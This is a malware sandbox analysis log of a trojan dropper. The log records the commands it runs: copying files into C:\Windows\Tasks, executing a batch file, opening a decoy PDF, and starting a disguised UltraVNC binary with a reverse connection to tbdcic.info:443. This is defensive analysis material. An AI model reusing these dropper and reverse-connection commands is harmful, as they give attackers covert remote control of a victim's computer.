Source: C:\Windows\Tasks\sync_browser.exe | Code function: 18_2_00007FF6DC0D3550 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetVersionExA,ExitWindowsEx,18_2_00007FF6DC0D3550
Source: C:\Windows\Tasks\sync_browser.exe | Code function: 18_2_00007FF6DC0D34B0 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,18_2_00007FF6DC0D34B0
Source: C:\Windows\Tasks\sync_browser.exe | Code function: 23_2_00007FF6DC0D3550 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetVersionExA,ExitWindowsEx,23_2_00007FF6DC0D3550
Source: C:\Windows\Tasks\sync_browser.exe | Code function: 23_2_00007FF6DC0D34B0 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,23_2_00007FF6DC0D34B0
                          Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Windows\Tasks\0271695705143540Jump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Windows\Tasks\id2rlx.MxYNRdJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Windows\Tasks\Nfe70s.UFVVkMJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Windows\Tasks\wFUH4p.aEmodeJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Windows\Tasks\WPSela.LSZr7VJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Windows\Tasks\0271695705143540.cmdJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Windows\Tasks\sync_browser.exeJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Windows\Tasks\UltraVNC.iniJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Windows\Tasks\conhost.exeJump to behavior
Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\WPSela.LSZr7V F7D4080AD8259B0AAC2504F8B5D8FAB18E5124321C442C8BCB577598059D0B24
Source: C:\Windows\Tasks\sync_browser.exe | Code function: String function: 00007FF6DC12A3B0 appears 38 times
Source: C:\Windows\Tasks\sync_browser.exe | Code function: String function: 00007FF6DC0CAE30 appears 34 times
Source: C:\Windows\Tasks\sync_browser.exe | Code function: String function: 00007FF6DC1770B4 appears 56 times
Source: C:\Windows\Tasks\sync_browser.exe | Code function: String function: 00007FF6DC179500 appears 42 times
Source: C:\Windows\Tasks\sync_browser.exe | Code function: String function: 00007FF6DC177C50 appears 60 times
Source: C:\Windows\Tasks\sync_browser.exe | Code function: String function: 00007FF6DC0C3730 appears 730 times
Source: C:\Users\user\Desktop\7q551ugrWe.exe | Code function: String function: 004026B0 appears 38 times
Source: WPSela.LSZr7V.0.dr | Static PE information: Resource name: JAVAARCHIVE type: Zip archive data, at least v2.0 to extract, compression method=deflate
Source: WPSela.LSZr7V.2.dr | Static PE information: Resource name: JAVAARCHIVE type: Zip archive data, at least v2.0 to extract, compression method=deflate
Source: sync_browser.exe.6.dr | Static PE information: Resource name: JAVAARCHIVE type: Zip archive data, at least v2.0 to extract, compression method=deflate
Source: 7q551ugrWe.exe, 00000000.00000003.2107015272.000000000266C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameCONHOST.EXEj% vs 7q551ugrWe.exe
Source: 7q551ugrWe.exe, 00000000.00000003.2108953574.000000000266B000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameWinVNC.exe0 vs 7q551ugrWe.exe
Source: 7q551ugrWe.exe, 00000000.00000003.2105276977.0000000002421000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamebrowser.exe( vs 7q551ugrWe.exe
Source: 7q551ugrWe.exe, 00000000.00000000.2102902028.000000000041C000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenamebrowser.exe( vs 7q551ugrWe.exe
Source: 7q551ugrWe.exe, 00000000.00000003.2108665384.000000000284F000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameWinVNC.exe0 vs 7q551ugrWe.exe
Source: 7q551ugrWe.exe | Binary or memory string: OriginalFilenamebrowser.exe( vs 7q551ugrWe.exe
Source: 7q551ugrWe.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: conhost.exe.6.dr | Binary string: \Device\ConDrv\Serveronecore\windows\core\console\open\src\server\winntcontrol.cpponecore\windows\core\console\open\src\interactivity\base\servicelocator.cppHost Signal Handler Threadonecore\windows\core\console\open\src\interactivity\base\hostsignalinputthread.cpponecore\windows\core\console\open\src\interactivity\win32\uiatextrange.cpponecore\windows\core\console\open\src\interactivity\win32\accessibilitynotifier.cpponecore\windows\core\console\open\src\interactivity\win32\windowmetrics.cpponecore\windows\core\console\open\src\interactivity\win32\systemconfigurationprovider.cpponecore\windows\core\console\open\src\interactivity\win32\window.cpponecore\windows\core\console\open\src\interactivity\win32\windowio.cpponecore\windows\core\console\open\src\interactivity\win32\icon.cpponecore\windows\core\console\open\src\interactivity\win32\windowuiaprovider.cpponecore\windows\core\console\open\src\interactivity\win32\windowproc.cpponecore\windows\core\console\open\src\interactivity\win32\clipboard.cpponecore\windows\core\console\open\src\interactivity\win32\screeninfouiaprovider.cpponecore\windows\core\console\open\src\types\viewport.cpponecore\windows\core\console\open\src\types\convert.cpponecore\windows\core\console\open\src\types\utils.cpp
Source: classification engine | Classification label: mal92.troj.spyw.evad.winEXE@50/46@2/1
Source: C:\Users\user\Desktop\7q551ugrWe.exe | Code function: 0_2_00408DBF wvsprintfW,GetLastError,FormatMessageW,FormatMessageW,FormatMessageW,lstrlenW,lstrlenW,lstrlenW,??2@YAPAXI@Z,lstrcpyW,lstrcpyW,lstrcpyW,??3@YAXPAX@Z,LocalFree,0_2_00408DBF
Source: C:\Windows\Tasks\sync_browser.exe | Code function: 18_2_00007FF6DC0D3550 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetVersionExA,ExitWindowsEx,18_2_00007FF6DC0D3550
Source: C:\Windows\Tasks\sync_browser.exe | Code function: 18_2_00007FF6DC0D18A0 GetCurrentProcessId,OpenProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,CloseHandle,CloseHandle,18_2_00007FF6DC0D18A0
Source: C:\Windows\Tasks\sync_browser.exe | Code function: 18_2_00007FF6DC0D34B0 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,18_2_00007FF6DC0D34B0
Source: C:\Windows\Tasks\sync_browser.exe | Code function: 23_2_00007FF6DC0D3550 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetVersionExA,ExitWindowsEx,23_2_00007FF6DC0D3550
Source: C:\Windows\Tasks\sync_browser.exe | Code function: 23_2_00007FF6DC0D18A0 GetCurrentProcessId,OpenProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,CloseHandle,CloseHandle,23_2_00007FF6DC0D18A0
Source: C:\Windows\Tasks\sync_browser.exe | Code function: 23_2_00007FF6DC0D34B0 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,23_2_00007FF6DC0D34B0
Source: C:\Users\user\Desktop\7q551ugrWe.exe | Code function: 0_2_004011D1 GetDiskFreeSpaceExW,SendMessageW,0_2_004011D1
Source: C:\Windows\Tasks\sync_browser.exe | Code function: OpenSCManagerA,CreateServiceA,GetLastError,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,18_2_00007FF6DC0D2D00
Source: C:\Windows\Tasks\sync_browser.exe | Code function: OpenSCManagerA,CreateServiceA,GetLastError,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,23_2_00007FF6DC0D2D00
Source: C:\Windows\Tasks\sync_browser.exe | Code function: 18_2_00007FF6DC129BC0 LoadLibraryA,GetProcAddress,GetProcAddress,GetSystemMetrics,GetCurrentProcessId,ProcessIdToSessionId,CreateToolhelp32Snapshot,Process32First,CloseHandle,FreeLibrary,ProcessIdToSessionId,ProcessIdToSessionId,CloseHandle,FreeLibrary,Process32Next,18_2_00007FF6DC129BC0
Source: C:\Users\user\Desktop\7q551ugrWe.exe | Code function: 0_2_0040385E _wtol,_wtol,SHGetSpecialFolderPathW,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,_wtol,CoCreateInstance,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,0_2_0040385E
Source: C:\Users\user\Desktop\7q551ugrWe.exe | Code function: 0_2_00401DC9 GetModuleHandleW,FindResourceExA,FindResourceExA,FindResourceExA,SizeofResource,LoadResource,LockResource,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,wsprintfW,LoadLibraryA,GetProcAddress,0_2_00401DC9
Source: C:\Windows\SysWOW64\cmd.exe | File created: C:\Users\user\Downloads\Lom.pdf
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4144:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2636:120:WilError_03
Source: C:\Windows\Tasks\sync_browser.exe | Mutant created: \Sessions\1\BaseNamedObjects\WinVNC_Win32_Instance_Mutex
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6784:120:WilError_03
Source: C:\Users\user\Desktop\7q551ugrWe.exe | File created: C:\Users\user\AppData\Local\Temp\7ZipSfx.000
Source: 7q551ugrWe.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\SysWOW64\taskkill.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "sync_browser.exe")
Source: C:\Users\user\Desktop\7q551ugrWe.exe | File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\7q551ugrWe.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: 7q551ugrWe.exe | ReversingLabs: Detection: 23%
Source: sync_browser.exe | String found in binary or memory: -stopservice
Source: sync_browser.exe | String found in binary or memory: -startservice
Source: sync_browser.exe | String found in binary or memory: -install
                          Source: sync_browser.exeString found in binary or memory: -stopservice
                          Source: sync_browser.exeString found in binary or memory: -startservice
                          Source: sync_browser.exeString found in binary or memory: -install
                          Source: C:\Users\user\Desktop\7q551ugrWe.exeFile read: C:\Users\user\Desktop\7q551ugrWe.exeJump to behavior
                          Source: unknownProcess created: C:\Users\user\Desktop\7q551ugrWe.exe "C:\Users\user\Desktop\7q551ugrWe.exe"
                          Source: C:\Users\user\Desktop\7q551ugrWe.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy /y "%CD%\*.*" "%CD%\..\..\..\..\..\..\Windows\Tasks\"
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Users\user\Desktop\7q551ugrWe.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c cd C:\Windows\Tasks\ & copy 0271695705143540 0271695705143540.cmd
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Users\user\Desktop\7q551ugrWe.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c cd C:\Windows\Tasks\ & 0271695705143540.cmd
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 1
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Downloads\Lom.pdf"
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 1
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im sync_browser.exe
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 2
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe | Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe | Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2084 --field-trial-handle=1760,i,4170063215735319094,17128991866469409438,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 1
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 2
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\Tasks\sync_browser.exe C:\Windows\Tasks\sync_browser.exe
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 8
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\Tasks\sync_browser.exe C:\Windows\Tasks\sync_browser.exe -autoreconnect -id:user-PC_VPANJC -connect tbdcic.info:443
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 2
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 4
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 42
Source: C:\Users\user\Desktop\7q551ugrWe.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy /y "%CD%\*.*" "%CD%\..\..\..\..\..\..\Windows\Tasks\"
Source: C:\Users\user\Desktop\7q551ugrWe.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c cd C:\Windows\Tasks\ & copy 0271695705143540 0271695705143540.cmd
Source: C:\Users\user\Desktop\7q551ugrWe.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c cd C:\Windows\Tasks\ & 0271695705143540.cmd
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 1
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Downloads\Lom.pdf"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 1
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im sync_browser.exe
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 2
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 1
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 2
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\Tasks\sync_browser.exe C:\Windows\Tasks\sync_browser.exe
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 8
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\Tasks\sync_browser.exe C:\Windows\Tasks\sync_browser.exe -autoreconnect -id:user-PC_VPANJC -connect tbdcic.info:443
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 2
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 4
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 42
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe | Process created: unknown unknown
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe | Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe | Process created: unknown unknown
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe | Process created: unknown unknown
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe | Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2084 --field-trial-handle=1760,i,4170063215735319094,17128991866469409438,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe | Process created: unknown unknown
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe | Process created: unknown unknown
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe | Process created: unknown unknown
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe | Process created: unknown unknown
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe | Process created: unknown unknown
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe | Process created: unknown unknown
Source: C:\Users\user\Desktop\7q551ugrWe.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\7q551ugrWe.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\7q551ugrWe.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\7q551ugrWe.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\7q551ugrWe.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\7q551ugrWe.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\7q551ugrWe.exe | Section loaded: propsys.dll
Source: C:\Users\user\Desktop\7q551ugrWe.exe | Section loaded: edputil.dll
Source: C:\Users\user\Desktop\7q551ugrWe.exe | Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\7q551ugrWe.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\7q551ugrWe.exe | Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\7q551ugrWe.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\7q551ugrWe.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Desktop\7q551ugrWe.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\7q551ugrWe.exe | Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\7q551ugrWe.exe | Section loaded: appresolver.dll
Source: C:\Users\user\Desktop\7q551ugrWe.exe | Section loaded: bcp47langs.dll
Source: C:\Users\user\Desktop\7q551ugrWe.exe | Section loaded: slc.dll
Source: C:\Users\user\Desktop\7q551ugrWe.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\7q551ugrWe.exe | Section loaded: sppc.dll
Source: C:\Users\user\Desktop\7q551ugrWe.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\Desktop\7q551ugrWe.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: cmdext.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: edputil.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: policymanager.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: msvcp110_win.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: appresolver.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: bcp47langs.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: slc.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: sppc.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: pcacli.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: sfc_os.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\timeout.exe | Section loaded: version.dll
Source: C:\Windows\SysWOW64\timeout.exe | Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe | Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe | Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe | Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe | Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe | Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe | Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe | Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe | Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe | Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe | Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\timeout.exe | Section loaded: version.dll
Source: C:\Windows\SysWOW64\timeout.exe | Section loaded: version.dll
Source: C:\Windows\SysWOW64\timeout.exe | Section loaded: version.dll
Source: C:\Windows\Tasks\sync_browser.exe | Section loaded: apphelp.dll
Source: C:\Windows\Tasks\sync_browser.exe | Section loaded: winmm.dll
Source: C:\Windows\Tasks\sync_browser.exe | Section loaded: version.dll
Source: C:\Windows\Tasks\sync_browser.exe | Section loaded: userenv.dll
Source: C:\Windows\Tasks\sync_browser.exe | Section loaded: wtsapi32.dll
Source: C:\Windows\Tasks\sync_browser.exe | Section loaded: dwmapi.dll
Source: C:\Windows\Tasks\sync_browser.exe | Section loaded: sspicli.dll
Source: C:\Windows\Tasks\sync_browser.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\Tasks\sync_browser.exe | Section loaded: uxtheme.dll
Source: C:\Windows\Tasks\sync_browser.exe | Section loaded: winsta.dll
Source: C:\Windows\Tasks\sync_browser.exe | Section loaded: napinsp.dll
Source: C:\Windows\Tasks\sync_browser.exe | Section loaded: pnrpnsp.dll
Source: C:\Windows\Tasks\sync_browser.exe | Section loaded: wshbth.dll
Source: C:\Windows\Tasks\sync_browser.exe | Section loaded: nlaapi.dll
Source: C:\Windows\Tasks\sync_browser.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\Tasks\sync_browser.exe | Section loaded: mswsock.dll
Source: C:\Windows\Tasks\sync_browser.exe | Section loaded: dnsapi.dll
Source: C:\Windows\Tasks\sync_browser.exe | Section loaded: winrnr.dll
Source: C:\Windows\Tasks\sync_browser.exe | Section loaded: windows.storage.dll
Source: C:\Windows\Tasks\sync_browser.exe | Section loaded: wldp.dll
Source: C:\Windows\Tasks\sync_browser.exe | Section loaded: riched32.dll
Source: C:\Windows\Tasks\sync_browser.exe | Section loaded: riched20.dll
Source: C:\Windows\Tasks\sync_browser.exe | Section loaded: usp10.dll
Source: C:\Windows\Tasks\sync_browser.exe | Section loaded: msls31.dll
Source: C:\Windows\Tasks\sync_browser.exe | Section loaded: riched32.dll
Source: C:\Windows\Tasks\sync_browser.exe | Section loaded: riched20.dll
Source: C:\Windows\Tasks\sync_browser.exe | Section loaded: usp10.dll
Source: C:\Windows\Tasks\sync_browser.exe | Section loaded: msls31.dll
Source: C:\Windows\Tasks\sync_browser.exe | Section loaded: riched32.dll
Source: C:\Windows\Tasks\sync_browser.exe | Section loaded: riched20.dll
Source: C:\Windows\Tasks\sync_browser.exe | Section loaded: usp10.dll
Source: C:\Windows\Tasks\sync_browser.exe | Section loaded: msls31.dll
Source: C:\Windows\Tasks\sync_browser.exe | Section loaded: riched32.dll
Source: C:\Windows\Tasks\sync_browser.exe | Section loaded: riched20.dll
Source: C:\Windows\Tasks\sync_browser.exe | Section loaded: usp10.dll
Source: C:\Windows\Tasks\sync_browser.exe | Section loaded: msls31.dll
Source: C:\Windows\Tasks\sync_browser.exe | Section loaded: riched32.dll
Source: C:\Windows\Tasks\sync_browser.exe | Section loaded: riched20.dll
Source: C:\Windows\Tasks\sync_browser.exe | Section loaded: usp10.dll
Source: C:\Windows\Tasks\sync_browser.exe | Section loaded: msls31.dll
Source: C:\Windows\Tasks\sync_browser.exe | Section loaded: riched32.dll
Source: C:\Windows\SysWOW64\timeout.exe | Section loaded: version.dll
Source: C:\Windows\Tasks\sync_browser.exe | Section loaded: winmm.dll
Source: C:\Windows\Tasks\sync_browser.exe | Section loaded: version.dll
Source: C:\Windows\Tasks\sync_browser.exe | Section loaded: userenv.dll
Source: C:\Windows\Tasks\sync_browser.exe | Section loaded: wtsapi32.dll
Source: C:\Windows\Tasks\sync_browser.exe | Section loaded: dwmapi.dll
Source: C:\Windows\Tasks\sync_browser.exe | Section loaded: napinsp.dll
Source: C:\Windows\Tasks\sync_browser.exe | Section loaded: pnrpnsp.dll
Source: C:\Windows\Tasks\sync_browser.exe | Section loaded: wshbth.dll
Source: C:\Windows\Tasks\sync_browser.exe | Section loaded: nlaapi.dll
Source: C:\Windows\Tasks\sync_browser.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\Tasks\sync_browser.exe | Section loaded: mswsock.dll
Source: C:\Windows\Tasks\sync_browser.exe | Section loaded: dnsapi.dll
Source: C:\Windows\Tasks\sync_browser.exe | Section loaded: winrnr.dll
Source: C:\Windows\Tasks\sync_browser.exe | Section loaded: fwpuclnt.dll
